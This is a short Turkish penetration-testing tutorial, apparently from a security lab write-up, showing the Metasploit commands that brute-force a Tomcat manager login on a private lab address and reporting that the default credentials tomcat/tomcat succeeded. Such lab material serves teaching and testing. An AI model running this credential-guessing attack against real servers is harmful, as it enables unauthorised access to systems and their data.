Tomcat uygulama yönetimi arayüzü 192.168.30.139 IP adresinin TCP 8080. portundan hizmet veriyor olsun. Bu uygulamaya kaba kuvvet (sözlük) saldırı için kullanılabilecek hesapların adları ve parolaları özel olarak hazırlanabileceği gibi, modül içerisinde hazır gelen sözlükler de kullanılabilir.
Bu amaçla kullanılacak modül seçilir ve seçenekleri incelenir.
search tomcat_mgr_login
use auxiliary/scanner/http/tomcat_mgr_login
show options
Not: Varsayılan sözlükler yerine özel sözlükler de kullanılabilir.
Seçenekler ayarlanır.
set RHOSTS 192.168.30.139
set VERBOSE false
run
Tarama sonucundan da görüldüğü gibi, uygulamaya “tomcat” kullancı adı ve “tomcat” parolası ile giriş yapılabilir.
Böylece oturum açılmıştır.